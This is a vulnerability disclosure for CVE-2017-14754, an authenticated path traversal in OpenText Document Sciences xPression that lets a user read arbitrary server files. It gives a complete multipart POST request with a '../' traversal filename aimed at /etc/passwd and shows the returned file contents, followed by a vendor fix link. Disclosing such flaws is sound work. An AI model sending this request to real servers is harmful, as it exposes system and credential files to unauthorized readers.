OpenText Document Sciences xPression version 4.5SP1 Patch 13 suffers from an arbitrary file read vulnerability.
ccde9b0619c01a56988bfe3396b12065Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - Arbitrary File Read
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14754
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
Arbitrary File Read:
====================
Authenticated user is able to read arbitrary system file due to path
traversal issue.
Vector :
--------
1) visit https://[...]/xAdmin/html/cm_datasource_summary.jsp and
select data source
2) modify and save datasource. xsd_datasource_schema_file parameter
filename is vulnerable:
POST /xAdmin/html/cm_datasource_group_xsd.jsp?action=get_schema_m HTTP/1.1
Host: [...]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[...]/xAdmin/html/cm_datasource_group_dispatcher.jsp?action=modify&refresh=yes&group_name=%43%75%73%74%6f%6d%65%72%58%58%45%74%65%73%74%27
Cookie: JSESSIONID=[...]; hideHeaderAndFooter=false
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------11140219741229998994791588049
Content-Length: 1472
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_group_id"
301
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="group_name"
aaa
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="group_name_old"
aaa
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_source"
fromServer
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_location"
aaa.xml
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_file";
filename="../../../../../../../../../../../../../../../../etc/passwd"
Content-Type: application/octet-stream
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="delimiter_xpath"
e
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="customer_key_xpath"
e
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema"
<?xml version="1.0" ?>
<aaa></aaa>
-----------------------------11140219741229998994791588049--
In response, file contents are returned:
HTTP/1.1 200 OK
[...]
<TEXTAREA name="xsd_datasource_schema" cols="10" rows="20"
class="largeoption"
readonly="readonly">root:x:0:0:[...]:/root:/bin/bash
bin:x:1:1:[...]:/bin:/sbin/nologin
daemon:x:2:2:[...]:/sbin:/sbin/nologin
adm:x:3:4:[...]:/var/adm:/sbin/nologin
sync:x:5:0:[...]:/sbin:/bin/sync
shutdown:x:6:0:[...]:/sbin:/sbin/shutdown
[...]
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl